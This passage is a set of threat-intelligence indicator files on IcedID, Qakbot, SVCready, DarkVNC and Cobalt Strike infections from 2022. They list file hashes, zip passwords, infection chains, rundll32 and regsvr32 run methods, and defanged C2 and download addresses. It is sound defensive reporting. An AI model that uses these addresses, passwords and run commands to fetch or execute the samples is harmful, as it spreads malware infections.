60 | COBALT STRIKE TRAFFIC (1 OF 2): 61 | 62 | - 217.79.243[.]147 port 8080 - bcnupdate[.]com:8080 - GET /lsass 63 | - 217.79.243[.]147 port 8080 - bcnupdate[.]com - GET /favicon.css?goto=true 64 | - 217.79.243[.]147 port 8080 - bcnupdate[.]com - POST /avatars 65 | 66 | COBALT STRIKE TRAFFIC (2 OF 2): 67 | 68 | - 194.37.97[.]139 port 8080 - solvesalesoft[.]com - HTTPS traffic -------------------------------------------------------------------------------- /2022-07-21-IOCs-for-IcedID-with-DarkVNC-and-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-07-21 (THURSDAY) ICEDID (BOKBOT) INFECTION WITH DARK VNC AND COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - Threat actors pushing IcedID have been active this week using thread-hijacked emails with password-protected zip archives containing ISO files. 6 | 7 | - Explorblins[.]com for the IcedID gzip binary was also reported on 2022-07-20 at https://twitter.com/pr0xylife/status/1549785810458841089 8 | 9 | ASSOCIATED MALWARE: 10 | 11 | - SHA256 hash: f0e7d595b2e3e5fd67e13a1db24506052487b1501d0b06ff50721c1902b47e8e 12 | - File size: 68,984 bytes 13 | - File name: Invoice_unpaid_July_21_document_11.zip 14 | - File description: Password-protected zip archive (distributed as email attachment) 15 | - Password: 0721 16 | 17 | - SHA256 hash: c00e2bd4b565faca702473ec323c0785fb958156109085c2e65d8e2132d5fe89 18 | - File size: 1,638,400 bytes 19 | - File name: Invoice_unpaid_July-21_document_11.iso 20 | - File description: ISO image extracted from the above zip archive 21 | 22 | CONTENTS OF THE ABOVE ISO IMAGE: 23 | 24 | - SHA256 hash: d0dcf0ef859cae89068152e08323fd7175eda951a050b36e11db29bcd931abe6 25 | - File size: 1,327 bytes 26 | - File name: documents.lnk 27 | - File description: Windows shortcut to run IcedID installer DLL 28 | - Shortcut: C:\Windows\System32\cmd.exe /c start rundll32.exe a4lomar.dll, PluginInit 29 | 30 | - SHA256 hash: fffeb0a9811bf7f77874eafcc2675c2ebc54a18c63b97b3701d2d4be2b89045f 31 | - File size: 184,320 bytes 32 | - File name: a4lomar.dll 33 | - File description: Hidden file, 64-bit DLL for IcedID installer 34 | - Run method: rundll32.exe [filename],PluginInit 35 | 36 | FILES RETRIEVED OR CREATED BY ICEDID INSTALLER: 37 | 38 | - SHA256 hash: 378dcb495c71e6517990d5962b90dc9be07ad9664b9945d3e1f0f12149722801 39 | - File size: 507,835 bytes 40 | - File location: hxxp://explorblins[.]com/ 41 | - File description: gzip binary retrieved by IcedID installer 42 | 43 | - SHA256 hash: 1de8b101cf9f0fabc9f086bddb662c89d92c903c5db107910b3898537d4aa8e7 44 | - File size: 342,218 bytes 45 | - File location: C:\Users\[username]\AppData\Roaming\OrdinaryNarrow\license.dat 46 | - File description: Created from gzip file, data binary used to run persistent IcedID DLL 47 | 48 | - SHA256 hash: d095c4c942974d05f58ade7d2a170333ea04a0e6da215de2492ac3bdee11f6da 49 | - File size: 164,864 bytes 50 | - File location: C:\Users\[username]\AppData\Roaming\[username]\seol64\Ebnifu.dll 51 | - File description: Created from gzip file, persistent IcedID DLL 52 | - Run method: rundll32.exe [filename],#1 --zoaq="[path to license.dat]" 53 | 54 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 55 | 56 | TRAFFIC FOR GZIP BINARY: 57 | 58 | - 165.22.201[.]70 port 80 - explorblins[.]com - GET / 59 | 60 | POST-INFECTION ICEDID C2 TRAFFIC: 61 | 62 | - 91.234.254[.]173 port 443 - weolaneocar[.]com - HTTPS traffic 63 | - 149.154.152[.]42 port 443 - brebdaalizan[.]com - HTTPS traffic 64 | - 149.154.152[.]42 port 443 - izzicarat[.]com - HTTPS traffic 65 | - 165.227.210[.]86 port 443 - cleverchaosname[.]com - HTTPS traffic 66 | - 188.93.233[.]241 port 443 - pnovajim[.]com - HTTPS traffic 67 | - 188.93.233[.]241 port 443 - mlidaxeraza[.]com - HTTPS traffic 68 | 69 | DARK VNC TRAFFIC: 70 | 71 | - 212.114.52[.]91 port 8080 - encrypted/encoded traffic 72 | 73 | COBALT STRIKE TRAFFIC: 74 | 75 | - 194.135.24[.]240 port 443 - HTTPS traffic -------------------------------------------------------------------------------- /2022-07-25-IOCs-for-IcedID-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-07-25 (MONDAY) ICEDID (BOKBOT) INFECTION WITH COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - Threat actors pushing IcedID have been active in recent weeks using thread-hijacked emails with password-protected zip archives containing ISO files. 6 | 7 | - eventbloodd[.]com used for the IcedID gzip binary was also reported at https://twitter.com/pr0xylife/status/1551620049093509122 8 | 9 | ASSOCIATED MALWARE: 10 | 11 | - SHA256 hash: d90d9a45fe57b2c1f1c158d485c9d3fa2032c72d2fb5c999bc6962941f3e0fea 12 | - File size: 229,983 bytes 13 | - File name: Unpaid_Loan_07.25.2022.5033.zip 14 | - File description: Password-protected zip archive (distributed as email attachment) 15 | - Password: office0725 16 | 17 | - SHA256 hash: d588284b7138a600c2472a8ce099f416a702e36d5eeed549cf07e487b469990c 18 | - File size: 868,352 bytes 19 | - File name: LoanStatus_07_25_22.iso 20 | - File description: ISO image extracted from the above zip archive 21 | 22 | INSTALLER DLL FOR ICEDID FROM THE ISO IMAGE: 23 | 24 | - SHA256 hash: 5c592f6203a05ba7065f4071f61ec841976ef5d825186bb06cfdfcd02063811d 25 | - File size: 334,336 bytes 26 | - File name: XAFlSh.dat 27 | - File description: 64-bit DLL for IcedID installer stored in hidden directory in the ISO 28 | - Run method: rundll32.exe [filename],#1 29 | 30 | FILES RETRIEVED OR CREATED BY ICEDID INSTALLER: 31 | 32 | - SHA256 hash: 5c456010adf58d4252f0a4505399704b8e6b2e94667aeeb740c072993d4e8488 33 | - File size: 663,485 bytes 34 | - File location: hxxp://eventbloodd[.]com/ 35 | - File description: gzip binary retrieved by IcedID installer 36 | 37 | - SHA256 hash: 1de8b101cf9f0fabc9f086bddb662c89d92c903c5db107910b3898537d4aa8e7 38 | - File size: 342,218 bytes 39 | - File location: C:\Users\[username]\AppData\Roaming\EnsureRaven\license.dat 40 | - File description: Created from gzip file, data binary used to run persistent IcedID DLL 41 | 42 | - SHA256 hash: 5973c98cb667d24911df5f31dc29da4ec85a18cf28bc0e9dc4cacdbf383ec7c3 43 | - File size: 320,512 bytes 44 | - File location: C:\Users\[username]\AppData\Local\{F6C33E9B-3A08-C66B-6926-ADA4E992B445}\Avpobb1.dll 45 | - File description: Created from gzip file, persistent IcedID DLL 46 | - Run method: rundll32.exe [filename],#1 --be="[path to license.dat]" 47 | 48 | WINDOWS EXECUTABLE FOR COBALT STRIKE: 49 | 50 | - SHA256 hash: d93155adefca33960a5a125f10854dc8178e80e9bf3b86600a4c59647dd80114 51 | - File size: 2,134,016 bytes 52 | - File location: hxxp://209.222.98[.]13/download/msb.exe 53 | - File location: C:\Users\[username]\AppData\Local\Temp\Ufruat64.exe 54 | - File description: gzip binary retrieved by IcedID installer 55 | 56 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 57 | 58 | TRAFFIC FOR GZIP BINARY: 59 | 60 | - 159.223.109[.]133 port 80 - eventbloodd[.]com - GET / 61 | 62 | POST-INFECTION ICEDID C2 TRAFFIC: 63 | 64 | - 165.227.210[.]86 port 443 - wronigrabs[.]com - HTTPS traffic 65 | - 165.227.210[.]86 port 443 - cleverchaosname[.]com - HTTPS traffic 66 | 67 | COBALT STRIKE TRAFFIC: 68 | 69 | - 209.222.98[.]13 port 80 - 209.222.98[.]13 - GET /download/msb.exe 70 | - 172.93.193[.]21 port 443 - sezijiru[.]com - HTTPS traffic 71 | -------------------------------------------------------------------------------- /2022-08-08-IOCs-for-IcedID-and-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-08-08 (MONDAY) - ICEDID (BOKBOT) INFECTION WITH COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> password-protected zip archive --> extracted ISO image --> files to install IcedID --> IcedID C2 --> Cobalt Strike 6 | 7 | ZIP ATTACHMENT AND EXTRACTED ISO IMAGE: 8 | 9 | - SHA256 hash: fb6d23f69d14d474ce096da4dcfea27a84c93f42c96f6dd8295d33ef2845b6c7 10 | - File size: 554,430 bytes 11 | - File name: erosstrucking-file-08.08.2022.zip 12 | - File description: password-protected zip archive 13 | - Password: office080822 14 | 15 | - SHA256 hash: d403df3fb181560d6ebf4885b538c5af86e718fecfabc73219b64924d74dd0eb 16 | - File size: 1,019,904 bytes 17 | - File name: order-130722.28554.iso 18 | - File description: ISO image extracted from the above zip archive 19 | 20 | CONTENTS OF ISO IMAGE: 21 | 22 | - SHA256 hash: 3d279aa8f56e468a014a916362540975958b9e9172d658eb57065a8a230632fa 23 | - File size: 401,115 bytes 24 | - File name: pss10r.chm 25 | - File description: CHM (Microsoft Compiled HTML Help) file used to run IcedID installer DLL 26 | 27 | - SHA256 hash: d240bd25a0516bf1a6f6b3f080b8d649ed2b116c145dd919f65c05d20fc73131 28 | - File size: 246,272 bytes 29 | - File name: app.dll 30 | - File description: 64-bit DLL installer for IcedID, hidden file on the ISO image. 31 | - Run method: rundll32.exe [filename],#1 32 | 33 | FILES FROM THE INFECTION: 34 | 35 | - SHA256 hash: e571bb9fa8d7aa7125b52f768d1b723e440ec352621a2c5410793a20a9eb1a01 36 | - File size: 576,956 bytes 37 | - File location: hxxp://abegelkunic[.]com/ 38 | - File description: gzip binary from abegelkunic.com used to creat license.dat and peristent IcedID DLL 39 | 40 | - SHA256 hash: 1de8b101cf9f0fabc9f086bddb662c89d92c903c5db107910b3898537d4aa8e7 41 | - File size: 342,218 bytes 42 | - File location: C:\Users\[username]\AppData\Roaming\PioneerSilly\license.dat 43 | - File description: data binary used to run persistent DLL for IcedID 44 | 45 | - SHA256 hash: 62ddbb31a8c75afe47c5f55288da2082bc2fdb34303b203cb6d46d00fcfe200a 46 | - File size: 233,984 bytes 47 | - File location: C:\Users\[username]\AppData\Local\{6CAB6B1F-1147-D823-B509-235172939D4D}\Utimmiws.dll 48 | - File description: 64-bit persistent DLL for IcedID 49 | - Run method: rundll32.exe [filename],#1 --giqo="[path to license.dat]" 50 | 51 | - SHA256 hash: af0161e32347bfcf617e1783f4a4a97154f5e2e4da55f0b8ac65e99fa746a907 52 | - File size: 1,017,856 bytes 53 | - File location: hxxp://104.238.220[.]131/download/sys.exe 54 | - File location: C:\User\[username]\AppData\Local\Temp\Liixke.exe 55 | - File location: C:\User\[username]\AppData\Local\Temp\sojeah.exe 56 | - File description: 64-bit EXE stager for Cobalt Strike 57 | 58 | TRAFFIC FROM THE INFECTION: 59 | 60 | INSTALLER RETRIEVES GZIP BINARY: 61 | 62 | - 178.62.238[.]75 port 80 - abegelkunic[.]com - GET / HTTP/1.1 63 | 64 | ICEDID C2 TRAFFIC: 65 | 66 | - 193.109.120[.]51 port 443 - ultomductingbig[.]pro - HTTPS traffic 67 | - 146.190.25[.]131 port 443 - alohasockstaina[.]com - HTTPS traffic 68 | - 46.21.153[.]211 port 443 - wiandukachelly[.]com - HTTPS traffic 69 | 70 | COBALT STRIKE ACTIVITY: 71 | 72 | - 23.106.223[.]135 port 443 - rehazosipa[.]com - HTTPS traffic, probable Cobalt Strike 73 | - 104.238.220[.]131 port 80 - 104.238.220[.]131 - GET /download/sys.exe HTTP/1.1 74 | - 172.93.179[.]196 port 443 - wafefuvuko[.]com - HTTPS traffic -------------------------------------------------------------------------------- /2022-08-15-IOCs-for-Monster-Libra-SVCready.txt: -------------------------------------------------------------------------------- 1 | 2022-08-15 (MONDAY) - MONSTER LIBRA (TA551/SHATHAK) PUSHES SVCREADY MALWARE 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> attached Word doc --> enable macros --> traffic for SVCready DLL --> SVCready C2 traffic --> possible follow-up activity 6 | 7 | NOTES: 8 | 9 | - Palo Alto Networks is tracking the TA551 (Shathak) threat actor as "Monster Libra." 10 | 11 | - Monster Libra currently pushes either IcedID (Bokbot), or it pushes SVCready malware. 12 | 13 | - Malicious Word documents from Monster Libra on 2022-08-15 use an Italian language template. 14 | 15 | - Since 2022-07-11, SVCready malware samples have not set up persistence correctly when we test these samples our lab environments. 16 | 17 | - SVCready's initial infection and data exfiltration still occur, but rundll32.exe is copied to the location that the SVCready DLL should be for persistence. 18 | 19 | - This means the scheduled task set up by the malware uses rundll32.exe to unsuccessfully run a copy of itself, instead of running the SVCready DLL. 20 | 21 | ASSOCIATED FILES: 22 | 23 | - SHA256 hash: e78276b7bd18e36dbd3a4b85eab8c55e9683f56b8fcf2360810859b9e801edf9 24 | - File size: 3,404,751 bytes 25 | - File name: [name removed].file.15.08.2022.doc 26 | - File description: Monster Libra Word document with macro code for SVCready 27 | 28 | - SHA256 hash: 6cbe0e1f046b13b29bfa26f8b368281d2dda7eb9b718651d5856f22cc3e02910 29 | - File size: 61,440 bytes 30 | - File location: C:\Users\[username]\AppData\Local\Temp\r19F2.tmp.exe 31 | - File description: Copy of legitimate Microsoft file rundll32.exe, not inherently malicious 32 | 33 | - SHA256 hash: f766d2ea0d8124120d712caad5f00ac51114076fa3354fb760ae64aae39147f1 34 | - File size: 1,332,736 bytes 35 | - File location: hxxp://45.89.54[.]120/6AFO0dsXmb/6AFO0dsXmb.php?uPUHsLURhNxs7-OfbGQ5Ga_LIgyD8S29Lg~~=Lsf4PGDFAYqkIDqE88ZTWDEJItzx79AOWg~~ 36 | - File location: C:\Users\[username]\AppData\Local\Temp\yCE1.tmp.dll 37 | - File location: Windows DLL for SVCready 38 | 39 | INFECTION TRAFFIC: 40 | 41 | - 45.89.54[.]120 port 80 - 45.89.54[.]120 - GET /6AFO0dsXmb/6AFO0dsXmb.php?uPUHsLURhNxs7-OfbGQ5Ga_LIgyD8S29Lg~~=Lsf4PGDFAYqkIDqE88ZTWDEJItzx79AOWg~~ 42 | - 34.141.91[.]129 port 80 - oilproduct[.]quest - POST /tyjigsdcdg/ruiohmc/uhgvrkr 43 | - 34.141.91[.]129 port 80 - oilproduct[.]quest - POST /tyjigsdcdg/ruiohmc 44 | - 34.141.91[.]129 port 80 - oilproduct[.]quest - POST /tyjigsdcdg/ruiohmc 45 | - 34.141.91[.]129 port 80 - oilproduct[.]quest - POST /tyjigsdcdg/ruiohmc/truheru 46 | - DNS query for biofarma[.]buzz - response: No such name 47 | - DNS query for biotech[.]cyou - response: No such name 48 | - DNS query for biotech[.]ink - response: No such name 49 | -------------------------------------------------------------------------------- /2022-09-29-IOCs-for-Obama207-Qakbot-and-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-09-29 (THURSDAY) - OBAMA207 QAKBOT (QBOT) INFECTION WITH COBALT STRIKE 2 | 3 | CHAIN OF EVENTS: 4 | 5 | - thread-hikacled email --> attached HTML file --> password-protected zip --> ISO --> files for Qakbot --> Qakbot C2 --> Cobalt Strike 6 | 7 | HEADERS FROM THREAD-HIJACKED EMAIL EXAMPLE: 8 | 9 | - Received: from linuxtr01.webimonline.com (linuxtr01.webimonline.com [194.1.192.131]) 10 | - X-Authenticated-Sender: linuxtr01.webimonline.com: marketing@polyfilmambalaj.com 11 | - From: 12 | - Date: Wed, 28 Sep 2022 20:14:32 +0300 13 | - Subject: Re: [subject line information removed] 14 | - Attachment name: REF#5689_Sep_28.html 15 | 16 | EXAMPLE OF ATTACHMENT AND EXTRACTED MALWARE: 17 | 18 | - SHA256 hash: 254fe44d8be366113010305301f9bb98c21046b819cdb7460f83177d2ea10eda 19 | - File size: 839,474 bytes 20 | - File name: REF#5689_Sep_28.html 21 | - File description: HTML file attached to thread-hijackedemail 22 | 23 | - SHA256 hash: af1e56b4e4e536e950dde6309529978d54b831c4dbed355d66acdd75c05e3b22 24 | - File size: 410,653 bytes 25 | - File name: attachment.zip 26 | - File description: password-protected zip archive presented by the above HTML file 27 | - Password: abc333 28 | 29 | - SHA256 hash: 74eadf557feb76f995acc9c3371712044c73e21323904bb41ba1a72378928d32 30 | - File size: 1,040,384 bytes 31 | - File name: REF#5694.iso 32 | - File description: ISO image extracted from the above zip archive 33 | 34 | CONTENTS OF ISO IMAGE: 35 | 36 | - SHA256 hash: 973a4e4501ebe54944cedce75462b30f90e5d06b60ced203ae9e7db66c1256e2 37 | - File size: 1,245 bytes 38 | - File name: REF.lnk 39 | - File description: Windows shortcut on ISO image 40 | - Shortcut: eloquentGlummer.js 41 | 42 | - SHA256 hash: fcdb889021a8ad5cc85f75de4247c052289dead4e09817f90e7f1ff516ea74be 43 | - File size: 154 bytes 44 | - File name and location on ISO image: gaffes\eloquentGlummer.js 45 | - File description: JS file run by the above Windows shortcut 46 | 47 | - SHA256 hash: cc4eea861c9c3a4ea4e9bd0e7cd6e19650f5d80d993536f41b8bd0735a7b56e4 48 | - File size: 142 bytes 49 | - File name and location on ISO image: gaffes\acknowledgeablyPartner.cmd 50 | - File description: CMD batch script run by the above JS file 51 | 52 | - SHA256 hash: d4adf98011c988085273146bac1d815f69adfd7c3722d8e2103c53c86b909be7 53 | - File size: 712,192 bytes 54 | - File name and location on ISO image: gaffes\wheelwright.db 55 | - File description: Qakbot DLL run by above CMD batch script 56 | - Run method: regsvr32.exe [filename] 57 | 58 | WORKING QAKBOT C2 TRAFFIC FROM AN INFECTED WINDOWS HOST: 59 | 60 | - 186.90.144[.]235 port 2222 - HTTPS traffic using TLS v1.3 61 | - 186.81.122[.]168 port 443 - HTTPS traffic using TLS v1.3 62 | - 85.86.242[.]245 port 443 - HTTPS traffic using TLS v1.3 63 | - 193.3.19[.]137 port 443 - HTTPS traffic using TLS v1.3 64 | 65 | COBALT STRIKE TRAFFIC SEEN DURING THIS INFECTION: 66 | 67 | - 194.165.16[.]64 port 80 - onefile[.]icu - GET /prepare/add.mp4a HTTP/1.1 68 | - 194.165.16[.]64 port 80 - onefile[.]icu - GET /risk.ico HTTP/1.1 69 | - 194.165.16[.]64 port 80 - onefile[.]icu - POST /target HTTP/1.1 (text/plain) -------------------------------------------------------------------------------- /2022-10-10-IOCs-for-Cobalt-Strike-from-Qakbot-infection.txt: -------------------------------------------------------------------------------- 1 | 2022-10-10 (MONDAY) - COBALT STRIKE FROM QAKBOT INFECTION 2 | 3 | CHAIN OF EVENTS: 4 | 5 | - link from email --> password-protected zip --> ISO --> Windows shortcut runs Qakbot DLL --> Qakbot C2 --> Cobalt Strike 6 | 7 | NOTES: 8 | 9 | - No binary for Cobalt Strike was saved to disk on the infected Windows host. 10 | 11 | - The URL used to kick off this infection was reported at URLhaus" https://urlhaus.abuse.ch/url/2353588/ 12 | 13 | DOWNLOADED ZIP ARCHIVE AND EXTRACTED ISO IMAGE: 14 | 15 | - SHA256 hash: e94d8d2ac206bc3fb9e020ee23a7e597ef280d14330034ed5b27b5b203f24de4 16 | - File size: 648,391 bytes 17 | - File name: N2752610163.zip 18 | - File location: hxxp://webexpertize[.]com/ssv/N2752610163.zip 19 | - File description: Password-protected zip archive returned from link in email 20 | - Password: X353 21 | 22 | - SHA256 hash: f07c5e4debb8c334afc75875ceacf5d4af627ba39b4eb65c56d70373d8ff0951 23 | - File size: 1,525,760 bytes 24 | - File name: New_documents#6904.iso 25 | - File description: ISO image extracted from the above zip archive 26 | 27 | CONTENTS OF THE EXTRACTED ISO IMAGE: 28 | 29 | - SHA256 hash: 2929d8090f813cffafab014a9915184def203147665e33ac0bc124c21aa22c30 30 | - File size: 1,185 bytes 31 | - File name: New_documents.lnk 32 | - File description: Windows shortcut 33 | 34 | - SHA256 hash: ed9240124e2a1628cd04d2e718c3d5eff496bca505b8df66e90d319f142667d8 35 | - File size: 271 bytes 36 | - File location: 3550\2646.cmd 37 | - File description: Batch file run by the above Windows shortcut 38 | 39 | - SHA256 hash: 80556052a05684ca0f8729c182aa3a48abb040fe5e358b6f67833b52dbd1c172 40 | - File size: 1,465,856 bytes 41 | - File location: 3550\unaccidental.dat 42 | - File description: DLL file for Qakbot 43 | - Run method: regsvr32.exe [filename] 44 | 45 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 46 | 47 | TRAFFIC FROM LINK IN THE EMAIL TO DOWNLOAD PASSWORD-PROTECTED ZIP ARCHIVE: 48 | 49 | - 162.241.85[.]74 port 80 - webexpertize[.]com - GET /ssv/ftugauit 50 | - 162.241.85[.]74 port 80 - webexpertize[.]com - GET /ssv/N2752610163.zip 51 | - Note: URL in the email was originally reported as HTTPS at https://urlhaus.abuse.ch/url/2353588/ 52 | 53 | QAKBOT POST-INFECTION TRAFFIC: 54 | 55 | - 190.73.190[.]235 port 443 - attempted TCP connections 56 | - 42.189.2[.]151 port 80 - attempted TCP connections 57 | - 105.99.214[.]100 port 443 - attempted TCP connections 58 | 59 | - 197.204.78[.]120 port 443 - HTTPS traffic (TLSv1.2) 60 | - 134.35.4[.]128 port 443 - HTTPS traffic (TLSv1.2) 61 | 62 | COBALT STRIKE TRAFFIC: 63 | 64 | - 64.44.102[.]244 port 443 - pigahinilu[.]com - HTTPS traffic (TLSv1.2) 65 | 66 | CERTIFICATE ISSUER DATA FOR QAKBOT HTTPS SERVER AT 197.204.78[.]120: 67 | 68 | - id-at-countryName=AT 69 | - id-at-stateOrProvinceName=JW 70 | - id-at-localityName=Wcqiyf 71 | - id-at-organizationName=Oaobt Tana Jtr Inc. 72 | - id-at-commonName=medg.org 73 | 74 | CERTIFICATE ISSUER DATA FOR QAKBOT HTTPS SERVER AT 134.35.4[.]128: 75 | 76 | - id-at-countryName=GB 77 | - id-at-stateOrProvinceName=HS 78 | - id-at-localityName=Jifieo Eetcgeqes 79 | - id-at-organizationName=Wijoi Ang Gkmvew Inc. 80 | - id-at-commonName=ucooezonym.com 81 | 82 | CERTIFICATE ISSUER DATA FOR COBALT STRIKE HTTPS SERVER AT 64.44.102[.]244 83 | 84 | - id-at-countryName=GB 85 | - id-at-stateOrProvinceName=Greater Manchester 86 | - id-at-localityName=Salfordc 87 | - id-at-organizationName=Sectigo Limited 88 | - id-at-commonName=Sectigo RSA Domain Validation Secure Server (CA) 89 | -------------------------------------------------------------------------------- /2022-10-31-IOCs-for-IcedID-with-DarkVNC-and-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-10-31 (MONDAY) - ICEDID (BOKBOT) INFECTION WITH DARK VNC AND COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> HTML attachment --> password-protected zip --> ISO --> Windows shortcut runs DLL --> IcedID C2 --> DarkVNC & Cobalt Strike 6 | 7 | NOTES: 8 | 9 | - This infection was generated from an HTML file submitted to Malware Bazaar by @k3dg3 at: 10 | https://bazaar.abuse.ch/sample/eca3ef27738569bbd0d4b577da6848068769e8164d7b3276c4867f3343a8c948/ 11 | 12 | ATTACHED HTML FILE: 13 | 14 | - SHA256 hash: eca3ef27738569bbd0d4b577da6848068769e8164d7b3276c4867f3343a8c948 15 | - File size: 251,507 bytes 16 | - File name: Unpaid_3945_Oct31.html 17 | - File description: HTML file attached to email distributing IcedID 18 | 19 | DOWNLOADED ZIP AND EXTRACTED ISO IMAGE: 20 | 21 | - SHA256 hash: d04e63e88ffefddb66b73308d1c1a8e2349d998b86eb1191b41732666cbf4cee 22 | - File size: 90,195 bytes 23 | - File name: Invoice.zip 24 | - File description: Password-protected zip archive presented by the above HTML file 25 | - Password: w1031 26 | 27 | - SHA256 hash: 043a13615bdfe7a7011f09b826a4a5f5597f8b8e4b9498c0807e67db9ad1ed88 28 | - File size: 1,703,936 bytes 29 | - File name: document_3_Oct31.iso 30 | - File description: ISO image containing files to install IcedID 31 | 32 | CONTENTS OF ISO IMAGE: 33 | 34 | - SHA256 hash: d2d2bda70687d4c070e06c44008880d1f52859f0e3bca67853978221799d6cbc 35 | - File size: 1,657 bytes 36 | - File name/location in the ISO: Data.lnk 37 | - File description: Windows shortcut that runs the below batch file 38 | 39 | - SHA256 hash: 0d64fb2cd5cce8f8e8a9ac1c311d1867ec1dadb7622a3bc5e930d1c7063ae62e 40 | - File size: 1,482 bytes 41 | - File name/location in the ISO: ribfaymasnot\chickenrelaxed.bat 42 | - File description: batch file that runs the below IcedID installer DLL 43 | 44 | - SHA256 hash: 2ff819c01e03fa26413bf607711df3e5a7f4efdffe55f57c3c637d6c7b408bec 45 | - File size: 206,848 bytes 46 | - File name/location in the ISO: ribfaymasnot\shortening.dat 47 | - File description: IcedID installer 64-bit DLL 48 | - Run method: rundll32.exe [filename],#1 49 | 50 | FILES FROM AN INFECTED WINDOWS HOST: 51 | 52 | - SHA256 hash: 0b65cb4b59b61689155c6599c5a8c256aac980dc602ac1daeb9bf273489c0e4f 53 | - File size: 562,907 bytes 54 | - File description: gzip binary retrieved from vgiragdoffy[.]com by the IcedID installer DLL 55 | 56 | - SHA256 hash: a0f5450deb333336e9d157e94647381036e7a9107ec842b24a9624d59cbfd59a 57 | - File size: 364,522 bytes 58 | - File location: C:\Users\[username]\AppData\Roaming\DifferSpeak\license.dat 59 | - File description: data binary used to run persistent IcedID DLL below 60 | 61 | - SHA256 hash: ff3be9c287431fec953681fd50c96632cefaa164a00ab84dcecd1a817537777e 62 | - File size: 197,632 bytes 63 | - File location: C:\Users\[username]\AppData\Roaming\[username]\Odwikp.dll 64 | - File description: 64-bit DLL for IcedID persistent on infected Windows host 65 | - Run method: rundll32.exe [filename],#1 --lahu="[path to license.dat]" 66 | 67 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 68 | 69 | INSTALLER DLL RETRIEVES GZIP BINARY: 70 | 71 | - 67.205.184[.]237 port 80 - vgiragdoffy[.]com - GET / 72 | 73 | POST-INFECTION ICEDID C2 TRAFFIC: 74 | 75 | - 137.184.208[.]116 port 443 - ringashopsu[.]com - HTTPS traffic 76 | - 138.68.255[.]102 port 443 - sainforgromset[.]com - HTTPS traffic 77 | - 94.140.114[.]103 port 443 - yeloypod[.]hair - HTTPS traffic 78 | - 66.63.168[.]75 port 443 - airsaintol[.]beauty - HTTPS traffic 79 | 80 | DARK VNC TRAFFIC: 81 | 82 | - 137.74.104[.]108 port 8080 - encrypted traffic 83 | 84 | COBALT STRIKE TRAFFIC: 85 | 86 | - 198.44.140[.]67 port 8008 - clouditsoft[.]com - HTTPS traffic 87 | -------------------------------------------------------------------------------- /2022-11-28-IOCs-for-BB08-Qakbot-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-11-28 (MONDAY) - BB08 DISTRIBUTION QAKBOT (QBOT) WITH COBALT STRIKE 2 | 3 | REFERENCES FOR INITIAL QAKBOT MALWARE: 4 | 5 | - https://twitter.com/pr0xylife/status/1597224425753309186 6 | - https://bazaar.abuse.ch/sample/7d1d7d196b3932e4e3e7cc1159f0e3ebab252f6a5f1ed6000f78d2133052a0de/ 7 | 8 | INFECTION CHAIN: 9 | 10 | - email --> link --> password-protected zip --> extracted iso --> .js --> .ps1 creates/runs Qakbot DLL from Base64 text --> Qakbot C2 --> Cobalt Strike 11 | 12 | ZIP ARCHIVE AND EXTRACTED ISO IMAGE: 13 | 14 | - SHA256 hash: 7d1d7d196b3932e4e3e7cc1159f0e3ebab252f6a5f1ed6000f78d2133052a0de 15 | - File size: 435,392 bytes 16 | - File name: AFL27.zip 17 | - File description: Password-protected zip archive downloaded from link in email 18 | - Password: P32M 19 | 20 | - SHA256 hash: 3da1cb0608f3709bf1331c4088fb258daf0200740b9b67afc6eec68a7f4b111a 21 | - File size: 759,808 bytes 22 | - File name: AFL27.iso 23 | - File description: ISO disk image extracted from the above zip archive 24 | 25 | CONTENTS OF ISO IMAGE: 26 | 27 | - SHA256 hash: d0f396309db14bbe988e8ae6ba6dfb4451fc9db830484dcb7dec830b74d8467a 28 | - File size: 9,491 byte 29 | - File location\name: AS.js 30 | - File location\name: peseta\flours.js 31 | - File description: Script used to run PowerShell script at peseta\gratiae.ps1 32 | 33 | - SHA256 hash: e6f4fe47c6e08c3b995b5e69efee09a853426607d64715bb1cf215640f785d58 34 | - File size: 367 bytes 35 | - File location\name: peseta\gratiae.ps1 36 | - File description: Powershell script used to convert base64 text at peseta\data.txt to a Qakbot DLL and run it 37 | 38 | - SHA256 hash: 9a6a43b0cdd989c911896933202401b848d2502db0219632f3aaa04a2e4687a4 39 | - File size: 645,120 bytes 40 | - File location\name: peseta\data.txt 41 | - File description: base64 text representing Qakbot DLL 42 | 43 | QAKBOT DLL GENERATED BY CONTENTS OF ISO IMAGE: 44 | 45 | - SHA256 hash: 9546ad96dd59612da1ea20637613ad0c1154e599b3c5a37b5404f4301cf78348 46 | - File size: 483,840 bytes 47 | - File location: C:\Users\Public\test1.txt 48 | - File description: 32-bit DLL for BB08 distribution Qakbot 49 | - Run method: rundll32.exe [filename],DrawThemeIcon 50 | 51 | QAKBOT C2 ACTIVITY: 52 | 53 | - 108.162.6[.]34:443 - HTTPS traffic 54 | - 86.159.48[.]25:2222 - HTTPS traffic 55 | 56 | QAKBOT TRAFFIC TO LEGITIMATE DOMAINS: 57 | 58 | - cisco.com 59 | - www.cisco.com 60 | - broadcom.com 61 | - www.broadcom.com 62 | - google.com 63 | - www.google.com 64 | - irs.gov 65 | - www.irs.gov 66 | - linkedin.com 67 | - www.linkedin.com 68 | - microsoft.com 69 | - www.microsoft.com 70 | - oracle.com 71 | - www.oracle.com 72 | - xfinity.com 73 | - www.xfinity.com 74 | 75 | NOTES: 76 | 77 | - The above are legitimate domains used by Qakbot as a connectivity check before each C2 connection. 78 | - Qakbot malware implemented this method as early as 2022-10-31. 79 | - Could be an anti-analysis method for isolated Windows hosts without Internet connectivity 80 | 81 | COBALT STRIKE C2 ACTIVITY: 82 | 83 | - 108.177.235[.]29:443 - jesofidiwi[.]com - HTTPS traffic -------------------------------------------------------------------------------- 